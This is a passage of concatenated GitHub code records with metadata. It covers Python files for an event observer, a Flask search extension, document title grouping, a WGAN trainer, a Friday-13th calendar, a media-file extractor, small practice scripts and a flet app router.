head\n","repo_name":"rainzhop/cumulus-tank","sub_path":"leetcode/easy/remove-duplicates-from-sorted-list.py","file_name":"remove-duplicates-from-sorted-list.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37204379878","text":"from collections import defaultdict\n\n\nclass Observable():\n\n def __init__(self):\n self.events = defaultdict(list)\n\n def on(self, event, *handlers):\n def _on_wrapper(*handlers):\n self.events[event].extend(handlers)\n return handlers[0]\n if handlers:\n return _on_wrapper(*handlers)\n return _on_wrapper\n\n def off(self, event=None, *handlers):\n if not event:\n self.events.clear()\n return True\n if not event in self.events:\n raise ValueError('event not found')\n if not handlers:\n self.events.pop(event)\n return True\n for callback in handlers:\n if not callback in self.events[event]:\n raise ValueError('handler not found')\n while callback in self.events[event]:\n self.events[event].remove(callback)\n return True\n\n def once(self, event, *handlers):\n def _once_wrapper(*handlers):\n def _wrapper(*args, **kw):\n for handler in handlers:\n handler(*args, **kw)\n self.off(event, _wrapper)\n return _wrapper\n if handlers:\n return self.on(event, _once_wrapper(*handlers))\n return lambda x: self.on(event, _once_wrapper(x))\n\n def trigger(self, event, *args, **kw):\n functions = self.events.get(event)\n if not functions:\n return False\n for event in functions:\n event(self, *args, **kw)\n return True\n\n\nclass Entity():\n\n event = Observable()\n\n def __init__(self):\n pass\n\n @event.on('message')\n def receive_message(self, message):\n print('@event.on(\\'message\\')', message)\n\n @event.once('killed')\n def die(self):\n 
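The remove-duplicates record above keeps its `ListNode` class only as a comment; a self-contained harness (local `ListNode` plus list/linked-list converters, all hypothetical names) that reproduces the problem's two examples:

```python
class ListNode:
    def __init__(self, val=0, nxt=None):
        self.val = val
        self.next = nxt

def delete_duplicates(head):
    last = head
    node = head.next if head else None
    while node is not None:
        if node.val == last.val:
            last.next = node.next   # unlink the duplicate
        else:
            last = node             # advance only on a new value
        node = node.next
    return head

def from_list(values):
    head = None
    for v in reversed(values):
        head = ListNode(v, head)
    return head

def to_list(head):
    out = []
    while head:
        out.append(head.val)
        head = head.next
    return out

print(to_list(delete_duplicates(from_list([1, 1, 2]))))        # [1, 2]
print(to_list(delete_duplicates(from_list([1, 1, 2, 3, 3]))))  # [1, 2, 3]
```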
print('@event.once(\\'killed\\')', 'I die just once!')\n\n\na = Entity()\n\na.event.trigger('message', 'hallo welt')\na.event.trigger('message', 'hallo welt')\na.event.trigger('message', 'hallo welt')\n\na.event.trigger('killed')\na.event.trigger('killed')\na.event.trigger('killed')","repo_name":"geselle-jan/py-test","sub_path":"observer.py","file_name":"observer.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"60795386","text":"from celery import current_app as current_celery\n\nfrom cern_search_rest_api.modules.cernsearch.celery import DeclareDeadletter\nfrom cern_search_rest_api.modules.cernsearch.views import build_blueprint, build_blueprint_record_files_content\n\n\nclass CERNSearch(object):\n \"\"\"CERN Search extension.\"\"\"\n\n def __init__(self, app=None):\n \"\"\"Extension initialization.\"\"\"\n if app:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Flask application initialization.\"\"\"\n self.init_config(app)\n\n blueprint = build_blueprint(app)\n app.register_blueprint(blueprint)\n\n blueprint_record_files_content = build_blueprint_record_files_content(app)\n app.register_blueprint(blueprint_record_files_content)\n\n current_celery.steps[\"worker\"].add(DeclareDeadletter)\n current_celery.conf.update(app.config[\"CELERYCONF_V6\"])\n self.register_signals(app)\n\n app.extensions[\"cern-search\"] = self\n\n def init_config(self, app):\n \"\"\"Initialize configuration.\"\"\"\n # Set up API endpoints for records.\n for k in dir(app.config):\n if k.startswith(\"CERN_SEARCH\"):\n app.config.setdefault(k, getattr(app.config, k))\n\n def register_signals(self, app):\n \"\"\"Register signals.\"\"\"\n if app.config[\"SEARCH_FILE_INDEXER\"]:\n from invenio_files_processor.signals import file_processed\n from invenio_files_rest.signals import file_deleted, file_uploaded\n from invenio_indexer.signals import before_record_index\n from invenio_records.signals import after_record_delete\n\n from cern_search_rest_api.modules.cernsearch.indexer import index_file_content\n from cern_search_rest_api.modules.cernsearch.receivers import (\n file_deleted_listener,\n file_processed_listener,\n file_uploaded_listener,\n record_deleted_listener,\n )\n\n file_uploaded.connect(file_uploaded_listener)\n file_processed.connect(file_processed_listener)\n file_deleted.connect(file_deleted_listener)\n after_record_delete.connect(record_deleted_listener)\n before_record_index.connect(index_file_content)\n","repo_name":"inveniosoftware-contrib/citadel-search","sub_path":"cern_search_rest_api/modules/cernsearch/ext.py","file_name":"ext.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"73165380969","text":"import re, collections, pprint\nfrom time import time\n\npp = pprint.PrettyPrinter(indent=4)\n\n#Ordinance Algorithm: For each title,\n#1) find the first instance of either ' for ' or ' No. ', and truncate\n#2) else, find the last instance of either ' at ' or ' as ', and truncate\ndef ordinance_parser(row):\n first_inst_pattern = re.compile(r\"(.+?)( for | No\\. 
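In the `Observable` record above, `once` works by registering a wrapper that first runs the handlers and then calls `off` on itself, which is why the 'killed' handler fires exactly once while 'message' fires every time. A minimal standalone sketch of that self-unsubscribing wrapper:

```python
class MiniEmitter:
    def __init__(self):
        self.events = {}

    def on(self, event, handler):
        self.events.setdefault(event, []).append(handler)

    def off(self, event, handler):
        self.events.get(event, []).remove(handler)

    def once(self, event, handler):
        def wrapper(*args, **kw):
            handler(*args, **kw)
            self.off(event, wrapper)   # unsubscribe after the first call
        self.on(event, wrapper)

    def trigger(self, event, *args, **kw):
        for handler in list(self.events.get(event, [])):
            handler(*args, **kw)

em = MiniEmitter()
em.once("killed", lambda: print("I die just once!"))
em.trigger("killed")   # prints
em.trigger("killed")   # silent
```

`trigger` iterates over a copy of the handler list so the removal performed inside `wrapper` cannot mutate the list mid-loop.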
| to | at )(.*)\")\n last_inst_pattern = re.compile(r\"(.+)( at | as )(.*)\")\n\n match = first_inst_pattern.match(row)\n if match != None:\n return match.group(1) #string\n\n else:\n match = last_inst_pattern.match(row)\n if match != None: \n return match.group(1)\n else:\n \t row_split = row.split(' ') #each title is a list of strings of words\n \t m = min(4, len(row_split))\n \t row_trunc = ' '.join(row_split[:m])\n\t\n \t return row_trunc \n\n#groups documents by title\n#Consider only the documents within the top k most common trunc_titles to be grouped\n#and indicate them with (title, text, trunc_title, TRUE, integer index of group).\n#Ungrouped docs are indicated: (title, text, trunc_title, FALSE, -1).\ndef group_titles(documentDict):\n\n trunc_titles = []\n remaining_docs = []\n indices = []\n\n keys = documentDict.keys()\n\n for key in keys:\n title, text = documentDict[key][0:2]\n \t#truncate each title using ordinance algorithm\n trunc_title = ordinance_parser(title)\n documentDict[key] = (title, text, trunc_title)\n\n trunc_titles = trunc_titles + [trunc_title]\n\n #count trunc_titles and pick out k most common\n counter = collections.Counter(trunc_titles)\n k = 17\n\n top_k = counter.most_common(k)\n top_titles = []\n total = 0\n for top, count in top_k:\n top_titles = top_titles + [top]\n total = total + count\n\n for key in keys:\n title, text, trunc = documentDict[key]\n if trunc in top_titles:\n documentDict[key] = (title, text, trunc, True, top_titles.index(trunc))\n else:\n documentDict[key] = (title, text, trunc, False, -1)\n\n pp.pprint('No. of docs organized by title analysis: ' + str(total))\n #pp.pprint(top_k)\n return documentDict\n\n#given a grouped dictionary, separate out the sorted titles and the unsorted ones\ndef title_analysis(startDict):\n\n\tt0 = time()\n\tgroupedDict = group_titles(startDict) #returns a dictionary of matter_id: (title, text, truncated_title, T/F is_this_doc_grouped_via_title_analysis, integer trunc_title_index)\n\tgroupedkeys = groupedDict.keys()\n\n\t#create a dictionary of docs not organized by title analysis\n\tremainingDict = dict()\n\tfor key in groupedkeys:\n\t\tif groupedDict[key][3] == False:\n\t\t\tremainingDict[key] = groupedDict[key]\n\n\tremainingkeys = list(remainingDict.keys())\n\n\tprint(\"There are \" + str(len(remainingkeys)) + \" documents remaining.\")\n\tprint(\"Title analysis done in %fs\" % (time() - t0))\n\n\treturn(groupedDict, remainingDict)\n","repo_name":"rebecca-burwei/city-hall-analysis","sub_path":"analyze_titles.py","file_name":"analyze_titles.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72565551207","text":"import torch as t\nimport torch.utils.data as d_utils\nimport torchvision.utils as tv_utils\nfrom ..Utilities import utilities as u\nfrom torch.autograd import Variable as V\n\n\nclass WGAN(object):\n def __init__(self, arch, ngpu):\n \"\"\"\n WGAN object. 
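The ordinance algorithm described in analyze_titles.py is easiest to verify on concrete titles: cut at the first ' for '/' No. '/' to '/' at ', else at the last ' at '/' as ', else keep at most the first four words. A short demo with the record's own patterns (the sample titles are invented):

```python
import re

first_inst = re.compile(r"(.+?)( for | No\. | to | at )(.*)")
last_inst = re.compile(r"(.+)( at | as )(.*)")

def truncate_title(title):
    m = first_inst.match(title)
    if m:
        return m.group(1)
    m = last_inst.match(title)
    if m:
        return m.group(1)
    return " ".join(title.split(" ")[:4])   # fallback: first four words

print(truncate_title("Ordinance No. 123 amending the zoning map"))
# Ordinance
print(truncate_title("Resolution approving a permit for 10 Main St"))
# Resolution approving a permit
print(truncate_title("Short untitled memo"))
# Short untitled memo
```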
This class is a wrapper of a generalized WGAN as explained in the paper:\n WASSERSTEIN GANS by Arjovsky et.al.\n\n Instance of this class initializes the Generator and the Discriminator.\n Arguments:\n arch = Architecture to use:\n \"CIFAR10\" for CIFAR10 dataset\n \"MNIST\" for MNIST dataset\n \"Generic\" for a general Generator and Discriminator architecture\n\n For CIFAR10/MNIST: Need to input n_z also.\n For Generic: Need to input image_size, n_z, n_chan, hiddens\n\n {'arch_type': ,\n 'params': as above}\n\n Example:\n {'arch_type': \"CIFAR10\",\n 'params': {'n_z': 128}}\n {'arch_type': \"Generic\",\n 'params': {'image_size': 32, 'n_z': 128, 'n_chan': 3, 'hiddens': }}\n\n image_size = Height / width of the real images\n n_z = Dimensionality of the latent space\n n_chan = Number of channels of the real images\n hiddens = Number of feature maps in the first layer of the generator and discriminator\n Format:\n hiddens = {'gen': n_gen_hidden,\n 'dis': n_dis_hidden}\n ngpu = Number of gpus to be allocated, if to be run on gpu\n \"\"\"\n super(WGAN, self).__init__()\n if arch['arch_type'] == 'Generic':\n from ..Architectures import Generic as DG\n self.Gen_net = DG.Generator(image_size=arch['params']['image_size'], n_z=arch['params']['n_z'],\n n_chan=arch['params']['n_chan'], n_hidden=arch['params']['hiddens']['gen'],\n ngpu=ngpu)\n self.Dis_net = DG.Discriminator(image_size=arch['params']['image_size'], n_chan=arch['params']['n_chan'],\n n_hidden=arch['params']['hiddens']['dis'], ngpu=ngpu)\n self.image_size = arch['params']['image_size']\n self.n_chan = arch['params']['n_chan']\n\n elif arch['arch_type'] == 'MNIST':\n from ..Architectures import MNIST as DG\n self.Gen_net = DG.Generator(n_z=arch['params']['n_z'], ngpu=ngpu)\n self.Dis_net = DG.Discriminator(ngpu=ngpu)\n self.image_size = 28\n self.n_chan = 1\n\n elif arch['arch_type'] == 'CIFAR10':\n from ..Architectures import CIFAR10 as DG\n self.Gen_net = DG.Generator(n_z=arch['params']['n_z'], ngpu=ngpu, gen_type=arch['params']['gen_type'])\n self.Dis_net = DG.Discriminator(ngpu=ngpu, dis_type=arch['params']['dis_type'])\n self.image_size = 32\n self.n_chan = 3\n\n self.ngpu = ngpu\n self.n_z = arch['params']['n_z']\n\n def train(self, dataset, batch_size, n_iters, dis_iters_per_gen_iter, clamps, optimizer_details,\n show_period=50, display_images=True, misc_options=['init_scheme', 'save_model']):\n \"\"\"\n Train function of the WGAN class. 
This starts training the model.\n Arguments:\n dataset = torch.utils.data.Dataset instance\n batch_size = batch size to be used throughout the training\n n_iters = Number of generator iterations to run the training for\n dis_iters_per_gen_iter = Number of discriminator iterations per generator iteration\n clamps = The weight thresholding clamps.\n Format:\n clamps = {'lower': , 'upper': }\n optimizer_details = Dictionary representing the details for optimizers for generator and discriminator\n Format:\n optimizer_details = {'gen':\n {'name' : Name of optimizer,\n 'learn_rate' : learning rate,\n 'betas' : (beta_1, beta_2), => Optional, if using Adam/Adamax\n 'momentum' : momentum, => Optional, if using momentum SGD/NAG\n 'nesterov' : True/False, => Optional, if using NAG},\n 'dis':\n }\n show_period (opt) = Prints the errors with current iteration number every show_period iterations\n display_images (opt) = If true, saves the real, reconstructed and generated images\n from noise every show_period*5 iterations\n misc_options (opt) = List of strings.\n - Add 'init_scheme' to the list, if you want to implement\n specific initialization schemes\n - Add 'save_model' to the list, if you want to save the model\n after n_iters iterations of training\n \"\"\"\n optimizer_details['gen']['params'] = self.Gen_net.parameters()\n optimizer_details['dis']['params'] = self.Dis_net.parameters()\n G_optmzr = u.get_optimizer_with_params(optimizer_details['gen'])\n D_optmzr = u.get_optimizer_with_params(optimizer_details['dis'])\n\n inpt = t.FloatTensor(batch_size, self.n_chan, self.image_size, self.image_size)\n noise = t.FloatTensor(batch_size, self.n_z, 1, 1)\n pos = t.FloatTensor([1])\n neg = pos.mul(-1)\n\n if display_images:\n fixed_noise = t.randn(batch_size, self.n_z, 1, 1)\n\n if 'init_scheme' in misc_options:\n self.Gen_net.apply(u.weight_init_scheme)\n self.Dis_net.apply(u.weight_init_scheme)\n\n if self.ngpu > 0:\n inpt = inpt.cuda()\n noise = noise.cuda()\n pos = pos.cuda()\n neg = neg.cuda()\n if display_images:\n fixed_noise = fixed_noise.cuda()\n\n self.Gen_net = self.Gen_net.cuda()\n self.Dis_net = self.Dis_net.cuda()\n\n self.Gen_net.train()\n self.Dis_net.train()\n\n d_loader = d_utils.DataLoader(dataset, batch_size, shuffle=True)\n\n # Train loop\n # Details to be followed:\n # 1. Train the discriminator first for dis_iters_per_gen_iter times. Train the discriminator with reals\n # and then with fakes\n # 2. Train the generator after training the discriminator\n\n gen_iters = 0\n flag = False\n print('Training has started')\n while not flag:\n d_iter = iter(d_loader)\n i = 0\n while i < len(d_loader):\n\n # Training the discriminator\n # We don't want to evaluate the gradients for the Generator during Discriminator training\n for params in self.Gen_net.parameters():\n params.requires_grad = False\n\n for params in self.Dis_net.parameters():\n params.requires_grad = True\n\n j = 0\n # Train the discriminator dis_iters_per_gen_iter times\n while j < dis_iters_per_gen_iter and i < len(d_loader):\n for params in self.Dis_net.parameters():\n params.data.clamp_(clamps['lower'], clamps['upper'])\n\n self.Dis_net.zero_grad()\n cur_data = d_iter.next()\n i = i + 1\n\n # Training with reals. 
These are obviously true in the discriminator's POV\n X, _ = cur_data\n if inpt.size() != X.size():\n inpt.resize_(X.size(0), X.size(1), X.size(2), X.size(3))\n inpt.copy_(X)\n inptV = V(inpt)\n\n otpt = self.Dis_net(inptV)\n otpt = u.de_sigmoid(otpt)\n err_D_r = (otpt.mean(0)).view(1)\n err_D_r.backward(pos)\n\n # Training with fakes. These are false in the discriminator's POV\n\n # We want same amount of fake data as real data\n if noise.size(0) != inpt.size(0):\n noise.resize_(inpt.size(0), noise.size(1), noise.size(2), noise.size(3))\n noise.normal_(0, 1)\n noiseV = V(noise)\n X_f = self.Gen_net(noiseV)\n otpt = self.Dis_net(X_f)\n otpt = u.de_sigmoid(otpt)\n err_D_f = (otpt.mean(0)).view(1)\n err_D_f.backward(neg)\n err_D = err_D_r - err_D_f\n D_optmzr.step()\n j = j + 1\n\n # Training the generator\n # We don't want to evaluate the gradients for the Discriminator during Generator training\n for params in self.Dis_net.parameters():\n params.requires_grad = False\n\n for params in self.Gen_net.parameters():\n params.requires_grad = True\n\n self.Gen_net.zero_grad()\n # The fake are reals in the Generator's POV\n noise.normal_(0, 1)\n noiseV = V(noise)\n X_gen = self.Gen_net(noiseV)\n otpt = self.Dis_net(X_gen)\n otpt = u.de_sigmoid(otpt)\n err_G = (otpt.mean(0)).view(1)\n err_G.backward()\n G_optmzr.step()\n\n gen_iters = gen_iters + 1\n\n # Showing the Progress every show_period iterations\n if gen_iters % show_period == 0:\n print('[{0}/{1}]\\tDiscriminator Error:\\t{2}\\tGenerator Error:\\t{3}'\n .format(gen_iters, n_iters, round(err_D.data[0], 5), round(err_G.data[0], 5)))\n\n # Saving the generated images every show_period*5 iterations\n if display_images:\n if gen_iters % (show_period*5) == 0:\n self.Gen_net.eval()\n gen_imgs = self.Gen_net(V(fixed_noise))\n\n gen_imgs.data = gen_imgs.data.mul(0.5).add(0.5)\n tv_utils.save_image(gen_imgs.data,\n 'WGAN_Generated_images@iteration={0}.png'.format(gen_iters))\n self.Gen_net.train()\n if gen_iters == n_iters:\n flag = True\n break\n\n if 'save_model' in misc_options and flag:\n t.save(self.Gen_net.state_dict(), 'WGAN_Gen_net_trained_model.pth')\n t.save(self.Dis_net.state_dict(), 'WGAN_Dis_net_trained_model.pth')\n print('Training over and model(s) saved')\n\n elif flag:\n print('Training is over')\n","repo_name":"DL-IT/generative_zoo","sub_path":"Modules/WGAN.py","file_name":"WGAN.py","file_ext":"py","file_size_in_byte":11326,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"53"} +{"seq_id":"28190813921","text":"'''\nAffiche la liste des vendredis 13 présents dans une année\nparamètres demandés : jour de la semaine au 1er janvier et année bissextile ou non.\nPython 3.x uniquement.\nIl s'agit d'un programme que j'ai rédigé il y a un an mais après tout il peut tout à faire servir dans le cadre de cet exercice :)\nA bientot!\nPol\n'''\n\ncal=[]\nJ=[\"lundi\",\"mardi\",\"mercredi\",\"jeudi\",\"vendredi\",\"samedi\",\"dimanche\"]\nprint(\"Bonjour!\")\nprint(\"Je vais t'indiquer la liste des Vendredi 13 d'une année que nous allons définir ensemble\")\n\n#année bissextile\nbissextile='z'\nwhile bissextile.lower() not in ('o','n'):\n bissextile=str(input(\"Souhaites-tu que l'année soit bissextile? (o pour oui, n pour non): \"))\nif bissextile=='o': f=29\nelse : f=28\n\n#saisie du jour au 1er janvier\nj=\"dredi\"\nwhile j.lower() not in (J):\n j=str(input(\"A quel jour de la semaine correspond le 1er janvier de ton annee? 
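The WGAN train loop above follows the Arjovsky et al. recipe: clamp critic weights, run several critic updates per generator update, and push the critic's output means in opposite directions for reals and fakes. A compact sketch of one critic/generator step on toy MLPs (tiny hypothetical networks with RMSprop, not the record's conv architectures or its `de_sigmoid` trick):

```python
import torch
import torch.nn as nn

G = nn.Sequential(nn.Linear(8, 16), nn.ReLU(), nn.Linear(16, 4))  # toy generator
D = nn.Sequential(nn.Linear(4, 16), nn.ReLU(), nn.Linear(16, 1))  # toy critic
opt_g = torch.optim.RMSprop(G.parameters(), lr=5e-5)
opt_d = torch.optim.RMSprop(D.parameters(), lr=5e-5)

real = torch.randn(32, 4)  # stand-in for a real data batch

for _ in range(5):  # dis_iters_per_gen_iter critic steps per generator step
    for p in D.parameters():
        p.data.clamp_(-0.01, 0.01)  # weight clipping, as in the record
    noise = torch.randn(32, 8)
    # Minimizing mean(D(fake)) - mean(D(real)) maximizes the critic gap.
    loss_d = D(G(noise).detach()).mean() - D(real).mean()
    opt_d.zero_grad()
    loss_d.backward()
    opt_d.step()

noise = torch.randn(32, 8)
loss_g = -D(G(noise)).mean()  # generator pushes critic scores on fakes up
opt_g.zero_grad()
loss_g.backward()
opt_g.step()
print(float(loss_d), float(loss_g))
```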
: \"))\na=J.index(j.lower())\n\nM=[[\"janvier\",31],[\"février\",f],[\"mars\",31],[\"avril\",30],[\"mai\",31],[\"juin\",30],[\"juillet\",31],[\"aout\",31],[\"septembre\",30],[\"octobre\",31],[\"novembre\",30],[\"décembre\",31]]\njour=[]\nnum=[]\nmois=[]\n\n#remplissage du calendrier\nfor j in range(12):\n for i in range (M[j][1]):\n jour.append(J[(a)%7])\n num.append(i+1)\n mois.append(M[j][0])\n cal.append([jour[i],num[i],mois[i]])\n a=a+1\n jour=[]\n num=[]\n mois=[]\n\n#affichage (en enlevant la condition tu as un joli calendrier sur l'année ...)\nprint(\"Et voici la liste :\")\nfor i in range(365):\n if cal[i][0]==\"vendredi\" and cal[i][1]==13:\n print(\"- \",end='')\n for z in range (3):\n print(cal[i][z],end=' ')\n print()\n\nprint(\"Au revoir!\")\ninput(\"tape ENTREE pour terminer\")\n","repo_name":"gitpqd/openclassrooms","sub_path":"vendredi13.py","file_name":"vendredi13.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72296605929","text":"#!/usr/bin/python3\n\n\nimport argparse\nimport glob\nimport os\nimport shutil\nfrom pathlib import Path\n\nimport config\nimport run\nimport util\nimport util_movie\nimport util_tv\nfrom printout import cstr, pfcs\n\nOPJ = os.path.join\nCFG = config.ConfigurationManager()\n\n\ndef validate_path(path):\n if isinstance(path, str):\n path = Path(path)\n if not isinstance(path, Path):\n print(f\"invalid path: {path}\")\n return None\n path = path.resolve()\n if not path.exists():\n print(f\"path does not exist: {str(path)}\")\n return None\n return path\n\n\ndef find_rar_in_path(path):\n path = validate_path(path)\n if not path:\n return None\n rar_files = list(path.glob(\"**/*.rar\"))\n if len(rar_files) > 1:\n for rar_file in rar_files:\n if rar_file.name.endswith(\"01.rar\"):\n return rar_file\n try:\n return rar_files[0]\n except IndexError:\n return None\n\n\ndef find_mkv_in_path(path):\n path = validate_path(path)\n if not path:\n return None\n skip_list = [\"Sample\", \"sample\"]\n found_files = path.glob(\"**/*.mkv\")\n mkv_files = []\n for f in found_files:\n if any([x in str(f) for x in skip_list]):\n continue\n mkv_files.append(f)\n if len(mkv_files) > 1:\n return None # TODO: determine which file is valid\n try:\n return mkv_files[0]\n except IndexError:\n return None\n\n\ndef find_nfo_file_in_path(path):\n path = validate_path(path)\n if not path:\n return None\n try:\n return list(path.glob(\"**/*.nfo\"))[0] # TODO: validate nfo file?\n except IndexError:\n return None\n\n\ndef determine_movie_destination(movie_name):\n letter = util_movie.determine_letter(movie_name)\n if isinstance(movie_name, Path):\n movie_name = movie_name.name\n return OPJ(CFG.get('path_film'), letter, movie_name)\n\n\ndef determine_episode_destination(episode_name):\n show = util_tv.determine_show_from_episode_name(episode_name)\n if not show:\n print(f\"could not determine show for {cstr(episode_name, 'lblue')}\")\n show = util_tv.guess_show_name_from_episode_name(episode_name)\n if not show:\n return None\n print(f\"guessing: {cstr(show, 'orange')}\")\n path = OPJ(CFG.get('path_tv'), show)\n if not os.path.exists(path):\n print(f\"{cstr(path, 'orange')} does not exist! 
will create\")\n season = util_tv.parse_season(episode_name)\n if not season:\n print(f\"could not determine season of {cstr(episode_name, 'orange')}\")\n return None\n return OPJ(path, f'S{season:02d}')\n\n\ndef process_movie_dir(movie_dir_source: Path):\n name = movie_dir_source.name\n pfcs(f\"processing: i[{name}] as type b[movie dir]\")\n nfo_loc = find_nfo_file_in_path(movie_dir_source)\n rar_loc = find_rar_in_path(movie_dir_source)\n mkv_loc = find_mkv_in_path(movie_dir_source)\n if not rar_loc and not mkv_loc:\n pfcs(f\"could e[not] find item to process in w[{movie_dir_source}]!\")\n return\n if rar_loc and mkv_loc:\n pfcs(f\"found e[both] rar and mkv in w[{movie_dir_source}]!\")\n return\n pfcs(f\"found file: i[{mkv_loc or rar_loc}]\")\n dest = determine_movie_destination(name)\n pfcs(f\"destination: i[{dest}]\")\n if rar_loc:\n if not run.extract(rar_loc, dest, create_dirs=True):\n return # extract failed\n if mkv_loc:\n run.move_file(mkv_loc, dest, create_dirs=True)\n if nfo_loc:\n imdb_id = util.parse_imdbid_from_file(nfo_loc)\n if imdb_id:\n print(\n f\"found imdb-id: {cstr(imdb_id, 154)}, will create movie.nfo\")\n util_movie.create_movie_nfo(dest, imdb_id)\n shutil.rmtree(movie_dir_source)\n print(f'removed {cstr(movie_dir_source, \"orange\")}')\n\n\ndef process_movie_file(movie_file_path):\n movie_path = validate_path(movie_file_path)\n if not movie_file_path:\n return\n if not movie_file_path.is_file():\n print(f\"path {movie_file_path.name} is not a file!\")\n return\n pfcs(f\"processing: i[{movie_file_path.name}] as type b[movie file]\")\n if not movie_file_path.suffix in util.video_extensions():\n pfcs(f\"could not determine destination for w[{movie_file_path.name}]\")\n return\n directory = str(movie_file_path.name).replace(movie_file_path.suffix, \"\")\n dest = determine_movie_destination(directory)\n pfcs(f\"destination: i[{dest}]\")\n run.move_file(movie_file_path, dest, create_dirs=True)\n\n\ndef process_movie(movie_path: Path):\n movie_path = validate_path(movie_path)\n if not movie_path:\n return\n if movie_path.is_dir():\n process_movie_dir(movie_path)\n else:\n process_movie_file(movie_path)\n\n\ndef process_episode(ep_path: Path):\n ep_path = validate_path(ep_path)\n if not ep_path:\n return\n dest = determine_episode_destination(ep_path.name)\n if not dest:\n pfcs(f\"could not determine destination for w[{ep_path}]\")\n return\n if ep_path.is_dir():\n pfcs(f\"processing: i[{ep_path.name}] as type b[episode dir]\")\n rar_loc = find_rar_in_path(ep_path)\n if not run.extract(rar_loc, dest, create_dirs=True):\n return # extract failed\n return\n pfcs(f\"processing: i[{ep_path.name}] as type b[episode file]\")\n run.move_file(ep_path, dest, create_dirs=True)\n\n\ndef extract_item(source_item_path):\n source_item_path = validate_path(source_item_path)\n if not source_item_path:\n return\n name = source_item_path.name\n if util_movie.is_movie(name):\n process_movie(source_item_path)\n elif util_tv.is_episode(name):\n process_episode(source_item_path)\n elif util_tv.is_season(name):\n if source_item_path.is_dir():\n pfcs(f\"processing: i[{name}] as type b[season dir]\")\n for item in source_item_path.iterdir():\n extract_item(item)\n pfcs(f\"g[done!] 
please remove w[{name}] manually.\")\n    else:\n        pfcs(f\"could not determine type of w[{name}]\")\n\n\nif __name__ == '__main__':\n    PARSER = argparse.ArgumentParser(description='extractor')\n    PARSER.add_argument('source', type=str, help='item(s) to process')\n    ARGS, _ = PARSER.parse_known_args()\n    CURRENT_DIR = Path.cwd()\n    if '*' in ARGS.source:\n        items = glob.glob(ARGS.source)\n        [extract_item(CURRENT_DIR / i) for i in items]\n    else:\n        extract_item(Path(ARGS.source))\n","repo_name":"GoblinDynamiteer/scripts","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":6435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30838258228","text":"\n\ndef bisearch(arr,n):\n    low=0\n    high=len(arr)-1\n    count=0\n    while low <= high:\n        mid=(low+high) // 2\n\n        if(arr[mid] <= n):\n            count+=(mid-low+1)\n            low=mid+1\n        else:\n            high=mid-1\n    return count\n\ndef issame(a,b):\n    arr=[]\n    count=0\n    b.sort()\n    n=0\n    for i in range(1,len(a)):\n        count=bisearch(b,i)\n        a[n]=count\n        n=i\n    \n    return a\n    \nx=[1,2,3,4,7,9]\ny=[0,1,2,1,1,4]\nprint(issame(x,y))\n\n","repo_name":"Ashis101/py-dsa","sub_path":"practise.py","file_name":"practise.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25489015623","text":"from cProfile import label\nimport csv\nimport matplotlib.pyplot as plot\n\n\n\ndata = []\nwith open('students-scores.csv') as infile:\n    text = infile.read().split()\n    captions = text[0].split(',')\n    for e in text[1:]:\n        stu = e.split(',')\n        scores = [float(sc) for sc in stu[1:]]\n        data.append([stu[0]] + scores)\n\n\nfor stu in data:\n    name = stu[0]\n    scores = stu[1:]\n    plot.clf()\n    plot.plot(scores, marker = 'o', label = 'Score')\n    plot.title(name)\n    plot.xticks(range(len(scores)), captions[1:])\n    plot.xlabel('Items')\n    plot.ylabel('Scores')\n    plot.ylim(0,100)\n    plot.tight_layout()\n    plot.savefig(name + '.png')\n    #plot.show()","repo_name":"JayChiang17/Data-Analysis","sub_path":"成績曲線.py","file_name":"成績曲線.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17428605424","text":"import flet as ft\nimport flet_route\nimport gui\nfrom gui import (\n    home,\n    register,\n    street,\n    barrier_control\n)\n\n\ndef main(page: ft.Page):\n    page.title = gui.NAME\n\n    page.window_width = gui.WIDTH\n    page.window_height = gui.HEIGHT\n    page.window_resizable = False\n\n    app_routes = [\n        flet_route.path(\n            url = '/reg',\n            clear = True,\n            view = register.IndexView\n        ),\n        flet_route.path(\n            url = '/',\n            clear = True,\n            view = home.IndexView\n        ),\n        flet_route.path(\n            url = '/street',\n            clear = True,\n            view = street.IndexView\n        ),\n        flet_route.path(\n            url = '/barrier_control',\n            clear = True,\n            view = barrier_control.IndexView\n        )\n    ]\n\n    flet_route.Routing(\n        page = page,\n        app_routes = app_routes\n    )\n\n    page.go('/reg')\n\n\nft.app(\n    target = main,\n    name = gui.NAME,\n    view = ft.AppView.FLET_APP,\n    assets_dir = gui.ASSETS_DIR,\n)\n","repo_name":"kottoamatsukami/Smart_Barrier","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8217870626","text":"# 내장함수 sorted 사용\nimport sys\nlst=[]\nfor _ in range(int(input())):\n    lst.append(int(sys.stdin.readline()))\nprint(*sorted(lst), end='\\n')\n\n# 버블정렬 - 시간복잡도 
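The `bisearch` helper in practise.py counts sorted elements <= n with a hand-rolled binary search; the standard library's `bisect_right` returns exactly that count in one call. An equivalent sketch (assumes the input list is sorted, as `issame` ensures with `b.sort()`):

```python
from bisect import bisect_right

def count_leq(sorted_arr, n):
    # Number of elements <= n: index of the first element greater than n.
    return bisect_right(sorted_arr, n)

b = sorted([0, 1, 2, 1, 1, 4])
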